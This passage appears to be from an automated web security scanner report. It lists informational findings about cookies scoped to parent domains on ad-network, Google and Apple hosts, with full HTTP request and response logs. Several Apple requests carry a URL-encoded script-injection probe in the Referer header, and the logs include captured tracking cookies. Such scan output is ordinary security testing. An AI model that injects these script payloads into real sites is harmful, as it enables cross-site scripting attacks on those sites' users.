anj=Kfw)lMs6P<)J70wKur<4<v9OZO`Cw?@(Ab3:R+2+c*%kr_:/X?Ak)WHO20e`pWODr.>EsQS(i-/Uy@K#D7=I`9Qj@i3IohFAK=EpRp=8iu`6^AvvYk57spMsA)Ny*m.MyKl%6BGq:Z^JcaKu)vEjYeujF+b18Fxm$MOR[)JLvcE)KO.76.qSHhgdqaIoB3RUYvPr0ZUf8Mh>2(^8PuQ+pSy][H%!:[iu4(rjI=E2'(lt=A70n`br-)rlaU@wBi9QioLa5X=$?7#DE]G)+bEfWTC1N2N$sXR2uWJeK-t44)iJf!Tsxb1Hy$8u6!mev>PNiog3FKUi9zSrzOyk*7aLWipoyDNXpz%#4WpCQ33u)c/NZ+Ej@zm+pq's!ITh`d8qDCqG4Q>(A@>d]>.cU%4$N^3_TQLU7L/Kq@O2F1+`*#jEI'*a(l[D8LQ#v.'w-3C-l>x.+bl?X<MIjG.?wV[9f1UU!>ac5ax>4aPE$ITii[4F7a%wePpjn$yOcwGf2jKcpAgKt#y:p<2GQqffer]c]Qt@xdELEaQGpAoL6c=z:-vT@v0=Gt655NI-[md]lT27($Xn$WCtH6_Y$oH`demw_qZ#QHw_Qhm1sPsY@oJMeP+HWCPm?rlbvf5u4jXkc8V=3B2X<X=scd*e+!ZF<_T[1il0l41u6oC+UA/SrjIEroHr<LVLh5)+D1K*MCQzWP!ozwCxQoPV:y!MK75J@Br)2-u%<]t`V1G7?_68GN2TTYW94>mfiE`pG:#(XC^p>uJ7*fY!pYkDwpm'k?4istsNK%wwPIa(y<p%; path=/; expires=Mon, 17-Oct-2011 18:37:06 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=119479&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lByB_/)J710+(.p3Z5+h4$Vy!yQYtW=Z5Z#lksL^h_:u[IkzlP?'IePJ/Z#Fy#8/vNL^@iW')uNV=zGung>(`Nvl+CN8u-4+Q:+G!i8zGW$6P0Ygj@gDJ6!3?ZhDD5$=8BCeDZt%n`?LyXoJ#6)EuCK6aCI$H_MElJh'P$eeW!*0s)5De8DL?*#b$[EsY7U88->_iR@sU@-_C!RX0K>pRo:'hdT`N%S]+?#:oYotSYv4@Yo^B@ypqVmgsn2IQvk]ngqdF)yegzmDu+k*[z^t:y@KNF?jNEu`nMBkjUs9T2ndLh!>yTe'`=U1hcD5i0M#o^+INb#$Fo#H]Y+!sTkU/=CCna0DqAscOQEb18*N=6E.D9a:91#6DRsnGmNy*nBg3QRvH6PO^D63]1Av>W9w7$qzEylR?X'('H+w*hOjM1CKvMOdL.x6nkE)2MTY5>uVbIIRX*WFGCg]V>7+6OIy0p@me-wEAV*5(6<x%kah-9v8G31F+D1hgwE.>bj3k$+_hrDkc0#`8fWEmU*b5Al<nY!0k14WeBG[Rc%(D3io)qo*(Vm%(Wt$).pcz]RVf*JJ.pv>fpY3BKSs8.f/qLc%eUa?ZD^I1VIp[X@kcfSC75Y_=l$)qPK]!zpr2SCQ-q]``OVL*/=(GCO7b!0sGu0sx<Y+$^WE/FM2.1ZPl%av@7<^=/5jy:KaE%l(nW>n3iDaFbwW!JTqWV-st*l7vo:UeNqhsP.`j$]GjFrRJtqDW3cBrZ9sY+WHuay<OsLep3

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 18:37:06 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:37:06 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lMs6P<)J70wKur<4<v9OZO`Cw?@(Ab3:R+2+c*%kr_:/X?Ak)WHO20e`pWODr.>EsQS(i-/Uy@K#D7=I`9Qj@i3IohFAK=EpRp=8iu`6^AvvYk57spMsA)Ny*m.MyKl%6BGq:Z^JcaKu)vEjYeujF+b18Fxm$MOR[)JLvcE)KO.76.qSHhgdqaIoB3RUYvPr0ZUf8Mh>2(^8PuQ+pSy][H%!:[iu4(rjI=E2'(lt=A70n`br-)rlaU@wBi9QioLa5X=$?7#DE]G)+bEfWTC1N2N$sXR2uWJeK-t44)iJf!Tsxb1Hy$8u6!mev>PNiog3FKUi9zSrzOyk*7aLWipoyDNXpz%#4WpCQ33u)c/NZ+Ej@zm+pq's!ITh`d8qDCqG4Q>(A@>d]>.cU%4$N^3_TQLU7L/Kq@O2F1+`*#jEI'*a(l[D8LQ#v.'w-3C-l>x.+bl?X<MIjG.?wV[9f1UU!>ac5ax>4aPE$ITii[4F7a%wePpjn$yOcwGf2jKcpAgKt#y:p<2GQqffer]c]Qt@xdELEaQGpAoL6c=z:-vT@v0=Gt655NI-[md]lT27($Xn$WCtH6_Y$oH`demw_qZ#QHw_Qhm1sPsY@oJMeP+HWCPm?rlbvf5u4jXkc8V=3B2X<X=scd*e+!ZF<_T[1il0l41u6oC+UA/SrjIEroHr<LVLh5)+D1K*MCQzWP!ozwCxQoPV:y!MK75J@Br)2-u%<]t`V1G7?_68GN2TTYW94>mfiE`pG:#(XC^p>uJ7*fY!pYkDwpm'k?4istsNK%wwPIa(y<p%; path=/; expires=Mon, 17-Oct-2011 18:37:06 GMT; domain=.adnxs.com; HttpOnly
Location: http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1
Date: Tue, 19 Jul 2011 18:37:06 GMT
Content-Length: 0

13.57. http://id.google.com/verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=49=aKI8Qf38sf5iqNDvmpR9QaOsG2ENxWmS7isjd7hL6A=s5nRc0fO0BVFm7NB; expires=Wed, 18-Jan-2012 20:49:48 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=10010
Cookie: SNID=49=a-QxWYPkNI-Nufnvk2C9rv3NQWchA8yTMpvQJEFhbw=3JQTMo0bYxLooY3T; PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=49=aKI8Qf38sf5iqNDvmpR9QaOsG2ENxWmS7isjd7hL6A=s5nRc0fO0BVFm7NB; expires=Wed, 18-Jan-2012 20:49:48 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:49:48 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

13.58. http://id.google.com/verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=49=aKI8Qf38sf5iqNDvmpR9QaOsG2ENxWmS7isjd7hL6A=s5nRc0fO0BVFm7NB; expires=Wed, 18-Jan-2012 20:49:48 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=10010
Cookie: SNID=49=a-QxWYPkNI-Nufnvk2C9rv3NQWchA8yTMpvQJEFhbw=3JQTMo0bYxLooY3T; PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

13.59. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734323&11206=734324&7382=734325&11095=734330; domain=.interclick.com; expires=Mon, 19-Jul-2021 15:16:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=beeaba0f-bbae-41f9-a021-0d36561089d9 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/BING_ENGAGEMENT_DISCOVERBING_GLOBAL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322; sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325&11095=734330

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734323&11206=734324&7382=734325&11095=734330; domain=.interclick.com; expires=Mon, 19-Jul-2021 15:16:57 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 19 Jul 2011 15:16:57 GMT

GIF89a.............!.......,...........D..;

13.60. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PUBRETARGET=78_1403859781.2114_1324986886.1996_1311621009.82_1405624242; domain=pubmatic.com; expires=Thu, 17-Jul-2014 19:10:42 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTE5OTYmdGw9MTAwODA= HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228?t=1311108254581&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; KRTBCOOKIE_57=476-uid:7212282717808390200; PUBRETARGET=78_1403859781.2114_1324986886.1996_1311621009.82_1405624242; KRTBCOOKIE_22=488-pcv:1|uid:3698952182471149434

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:06 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1403859781.2114_1324986886.1996_1311621009.82_1405624242; domain=pubmatic.com; expires=Thu, 17-Jul-2014 19:10:42 GMT; path=/
Content-Length: 42
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

13.61. http://images.apple.com/global/nav/scripts/globalnav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/scripts/globalnav.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=eKwIcPZgJHsw/8hbkWk9NfbHjaEfvezhpVDm9O8an1EjF8hLQjxhpUGXNk+TIL7iWWOIrci6QZbyox1vAlXFVihrt8rDm2O1C6WZLWbAaeFfFc7jmCkxXgIJaupEJRaY6NgELLxXeKF6EFrxpC7vR5zyxY1a4A3pO+U0y8n9QBs3xRZfEwZgN9+DCPhXS98jOpRP7LpdSOv2oPnk8imbvq0cQipmLUkqb4k/+DxDtbStL1gFEy4RIwc2KInyZBbJTTULrcNK344YNZQOBNahULD1xr0ZcBZuhC5lRSS+hbELGgk0olyljSa4egdnMaJfinm6RL25YdaJ0dnV06Zyy+AHGuS35bhCQUMkT6XaneeJ/deVwipi4jmBu0ZUjOukjt15yG/+Z/DVtLPltA7trg0BnR+smGw+vCc1PTuMBLhsnRKdF9q7TVZPFLMsXPy7DRG/9FOpNiW6ByUXJh8RgVGxqTBDP8GgLVcbjQDZ/IlZJXnQOajXAhKlz9efbW//nt1FnB+h0mxLTQ1q+LO/zePTWbXI3IlzV1FTThIKOC19AyDmCBQUmUkMEDKnmJ8E; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/scripts/globalnav.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 21 Apr 2011 20:13:41 GMT
If-None-Match: "6e6f-4a173609c2740"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Apr 2011 20:13:41 GMT
ETag: "6e6f-4a173609c2740"
Cache-Control: max-age=356
Expires: Tue, 19 Jul 2011 18:56:37 GMT
Date: Tue, 19 Jul 2011 18:50:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=eKwIcPZgJHsw/8hbkWk9NfbHjaEfvezhpVDm9O8an1EjF8hLQjxhpUGXNk+TIL7iWWOIrci6QZbyox1vAlXFVihrt8rDm2O1C6WZLWbAaeFfFc7jmCkxXgIJaupEJRaY6NgELLxXeKF6EFrxpC7vR5zyxY1a4A3pO+U0y8n9QBs3xRZfEwZgN9+DCPhXS98jOpRP7LpdSOv2oPnk8imbvq0cQipmLUkqb4k/+DxDtbStL1gFEy4RIwc2KInyZBbJTTULrcNK344YNZQOBNahULD1xr0ZcBZuhC5lRSS+hbELGgk0olyljSa4egdnMaJfinm6RL25YdaJ0dnV06Zyy+AHGuS35bhCQUMkT6XaneeJ/deVwipi4jmBu0ZUjOukjt15yG/+Z/DVtLPltA7trg0BnR+smGw+vCc1PTuMBLhsnRKdF9q7TVZPFLMsXPy7DRG/9FOpNiW6ByUXJh8RgVGxqTBDP8GgLVcbjQDZ/IlZJXnQOajXAhKlz9efbW//nt1FnB+h0mxLTQ1q+LO/zePTWbXI3IlzV1FTThIKOC19AyDmCBQUmUkMEDKnmJ8E; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.62. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=QdtF1drqHnVlSB+HwBLvnZMiEH6obQO+cu9Z/v2U4XKn7rs0v9NnOT8WpKGzWszZlmje/F2XWEPjpKcWLnxgaqw4+z0GeGzRkZ9NOc/XiCNPPBXvTsfWU/g93BDPgA5zkECn2p9RSPgnJEs58xCAf8Cyl5p8pL4q0s5Aprv3Hs42UW70Bq0TWB0AbW4MKqf0HabQXZ+JvBhnCX2ORQFO2SJmDWUxjUkeeXAtgAUN5hIVdywMaWSem8rwn+z7IrWlTS/hxGAGzAZE8P/DWcNTgVmHWuZYsNMed65Ys0NGnEexIGgeNdPrLu2Mqi1suK7HER0VT6wkB9Kwf1Cz4qdD2Y6ZyKYHSnAYTn0P4ENkkZnV0fK7QYR5TLqAMO21fhZjuKqoVUVyYY6Qa4AUEikaRwSSGj0PQn0LhG7Waf8R398H2av/rJYZxvilwDxaDMZY2Y2ok/AFZpf0uBMPk9+1hKXcD6060vM7LXdbkrcPWkzwdvbpK+RHINHLtSVt6HMqGCAdX4NakPCikSyRX6v1+sF3E8CWlp5sb00mun82sVBkihULVVRPk9DdFPGZhes2; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT
If-None-Match: "2930-4a3055a8a0000"

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=371
Expires: Tue, 19 Jul 2011 18:56:51 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=QdtF1drqHnVlSB+HwBLvnZMiEH6obQO+cu9Z/v2U4XKn7rs0v9NnOT8WpKGzWszZlmje/F2XWEPjpKcWLnxgaqw4+z0GeGzRkZ9NOc/XiCNPPBXvTsfWU/g93BDPgA5zkECn2p9RSPgnJEs58xCAf8Cyl5p8pL4q0s5Aprv3Hs42UW70Bq0TWB0AbW4MKqf0HabQXZ+JvBhnCX2ORQFO2SJmDWUxjUkeeXAtgAUN5hIVdywMaWSem8rwn+z7IrWlTS/hxGAGzAZE8P/DWcNTgVmHWuZYsNMed65Ys0NGnEexIGgeNdPrLu2Mqi1suK7HER0VT6wkB9Kwf1Cz4qdD2Y6ZyKYHSnAYTn0P4ENkkZnV0fK7QYR5TLqAMO21fhZjuKqoVUVyYY6Qa4AUEikaRwSSGj0PQn0LhG7Waf8R398H2av/rJYZxvilwDxaDMZY2Y2ok/AFZpf0uBMPk9+1hKXcD6060vM7LXdbkrcPWkzwdvbpK+RHINHLtSVt6HMqGCAdX4NakPCikSyRX6v1+sF3E8CWlp5sb00mun82sVBkihULVVRPk9DdFPGZhes2; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.63. http://images.apple.com/global/scripts/apple_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=m9/CPkw5LYIvCVzI84KswFfsTPWQTIJawwQIZs9o2PB0TBT1ovgy3ln6NmgFVXWxe28ZkpzYNgIOieP+3eWkJAxVytLayQ1tfgMcX6DRdUmAnmimWKGqd1xzwenJEayZwv7uxmhSF3CLrp93uSRC4YAAo8gcHB6esH9FOaxBi4Flva6z29KPIxWB7aWVfwK2AKRb4ZCDECK/uY3+TvkeJeYH5GbI/qWQEudByrxnPrDLhuhhyWCvk+8ARqzhXx5rlLcRqDZbVkEN6MgXCE6VIleRIOzVcf8J9TlQ/WwKlsu3VInW+sFCFQcJve8SUEbn+2GSz2o4ZnWqP0VnTvJAfyRsLxqbEMtCt29XklyX2RYPUMNix5b/oCM/cW4vKZfJT1Y9vGXe0Fjvva6FucMUCdROvPiCeFfQKEQv6GlbBv6I58Od4d6gv9Qh9/PMPhmzbNRdfR+EREc/ZOaKdVdHWAQB6kgbzc+xtEev6d2e5xvlYpQO/MuQLYnWwIRc3zu7hyz4n2T+tx27XrIVxumLBYm7MT7koJZi7SrwP50EfcHb+NaXkzPal8ObUbigg59I; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/apple_core.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; 